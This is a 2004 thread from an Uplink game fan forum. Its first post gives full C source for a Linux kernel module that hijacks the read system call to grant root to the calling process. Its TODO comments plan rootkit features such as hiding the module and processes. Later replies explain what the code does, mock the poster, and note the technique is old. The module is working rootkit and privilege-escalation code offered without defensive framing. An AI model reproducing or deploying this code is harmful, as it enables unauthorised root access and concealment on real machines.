...

Anything and Everything about Uplink

Moderators: jelco, bert_the_turtle, Chris, Icepick, Rkiver

lattera
level4
level4
Posts: 722
Joined: Mon Jun 24, 2002 2:25 am

...

Postby lattera » Mon Jul 05, 2004 5:25 am

too bad linux kernel coders don't know crap about security

Code: Select all

#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/init.h>

#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/vmalloc.h>

#include <asm/unistd.h>

#define SCT_LOC 0xc044d580

/* TODO
   1) Find sys_call_table dynamically (look through kmem)
   2) hide the module
   3) do some network-related shit
   4) hide processes
   5) m00
*/
void **sys_call_table = (void **)SCT_LOC; /* Found via System.map */

ssize_t (*orig_read)(unsigned int, char __user *, size_t);

ssize_t my_read(unsigned int fd, char __user *buf, size_t count)
{
   current->uid=0;
   current->euid=0;
   return orig_read(fd, buf, count);
}

static int lkm_init(void)
{
   orig_read = sys_call_table[__NR_read];
   sys_call_table[__NR_read] = my_read;
   return 0;
}

static void lkm_exit(void)
{
   sys_call_table[__NR_read] = orig_read;
}

module_init(lkm_init);
module_exit(lkm_exit);

/* Actually, the license is BSD-only, but this makes it so that it will load silently... */
MODULE_LICENSE("Dual BSD/GPL");
Nitronium
level3
level3
Posts: 257
Joined: Sat Aug 10, 2002 4:15 pm
Location: South Manchester, England

Postby Nitronium » Mon Jul 05, 2004 6:00 am

m00!

oooo, deadly!
Deepsmeg
level5
level5
Posts: 6510
Joined: Thu Mar 21, 2002 1:26 pm
Location: Register 2102
Contact:

Postby Deepsmeg » Mon Jul 05, 2004 12:47 pm

I guess this helps demonstrate my ignorance...

What should that code do?
What DOES it do?
Why is it bad?
Image
itax
level2
level2
Posts: 85
Joined: Sun Jun 20, 2004 7:05 pm
Contact:

Postby itax » Mon Jul 05, 2004 3:19 pm

I thought Linux was very secure!!, My dad uses it and he never got a virus nor trojan nor hacker in his system...
I use win98 and each day my scanner picks up 15+ Viruses/Trojans and once in a while i find some maps to be totally deleted :shock:

:P Itax :P
Image
Stewsburntmonkey
level5
level5
Posts: 11553
Joined: Wed Jul 10, 2002 7:44 pm
Location: Nashville, TN
Contact:

Postby Stewsburntmonkey » Mon Jul 05, 2004 3:31 pm

. . .

Yet another waste of a topic thanks to lattera. . .
Deepsmeg
level5
level5
Posts: 6510
Joined: Thu Mar 21, 2002 1:26 pm
Location: Register 2102
Contact:

Postby Deepsmeg » Mon Jul 05, 2004 4:13 pm

itax: shut up.
Windows has security issues.
Linux has security issues.
Everything has some faults.

SBM: Err... compared to some threads, this has value

Anyone: Care to answer my questions in my earlier post?
Image
Stewsburntmonkey
level5
level5
Posts: 11553
Joined: Wed Jul 10, 2002 7:44 pm
Location: Nashville, TN
Contact:

Postby Stewsburntmonkey » Mon Jul 05, 2004 4:29 pm

I was commenting on the lack of a topic title and the lack of any real comment on the code itself. He just posts it to show us how "leet" he is that he can find/exploit (although this in an old and well documented exploit) Linux security flaws. It is his way of trying to assert his technological superiority. Funnily he is generally well off the mark and in the end tends to make an ass of himself, but he will try nonetheless. I just find this kind of thing highly annoying and unnecessary.

The code redirects the system read calls to his own code which could capture the content of the call. This is similar to a key logger. However here I believe he tries to give the current user root access.
Last edited by Stewsburntmonkey on Mon Jul 05, 2004 4:41 pm, edited 3 times in total.
Deepsmeg
level5
level5
Posts: 6510
Joined: Thu Mar 21, 2002 1:26 pm
Location: Register 2102
Contact:

Postby Deepsmeg » Mon Jul 05, 2004 4:34 pm

True.
And why is it each time he does this and I ask what the code should do, does do, and stuff like that noone answers me?
Image
Stewsburntmonkey
level5
level5
Posts: 11553
Joined: Wed Jul 10, 2002 7:44 pm
Location: Nashville, TN
Contact:

Postby Stewsburntmonkey » Mon Jul 05, 2004 4:37 pm

I just edited my above post to answer your question. :)
PiD4x
level1
level1
Posts: 34
Joined: Wed Jun 16, 2004 11:31 am
Location: Australia
Contact:

Postby PiD4x » Mon Jul 05, 2004 5:23 pm

current->uid=0;
current->euid=0;

im guessing has to do with these two lines, heh root anyone? :wink:
lattera
level4
level4
Posts: 722
Joined: Mon Jun 24, 2002 2:25 am

Postby lattera » Mon Jul 05, 2004 10:25 pm

this exploit is sortof old... the point of the code was that sys_call_table is still fully controllable in 2.6 (it's not exported).

if you read the TODO, then that will tell you what's going to be going on... that code is just a start of what is to come :)
lattera
level4
level4
Posts: 722
Joined: Mon Jun 24, 2002 2:25 am

Postby lattera » Tue Jul 06, 2004 5:22 am

sys_call_table has been dynamically found (not via System.map, but directly with kernel memory) about 30 minutes ago

(07/05/2004 10:21 PM)
coolsi
level5
level5
Posts: 3990
Joined: Wed Apr 10, 2002 6:46 pm

Postby coolsi » Tue Jul 06, 2004 7:27 am

I think I can speak for everyone when I say:

No

One

Cares.
Nakatomi is coming
Stewsburntmonkey
level5
level5
Posts: 11553
Joined: Wed Jul 10, 2002 7:44 pm
Location: Nashville, TN
Contact:

Postby Stewsburntmonkey » Tue Jul 06, 2004 12:24 pm

I'm amazed that he can apparently spend hour reinventing the wheel, yet apparently can't be bothered to seach google to check wheither others have already done this (which they have in this case).

Return to “General”

Who is online

Users browsing this forum: No registered users and 14 guests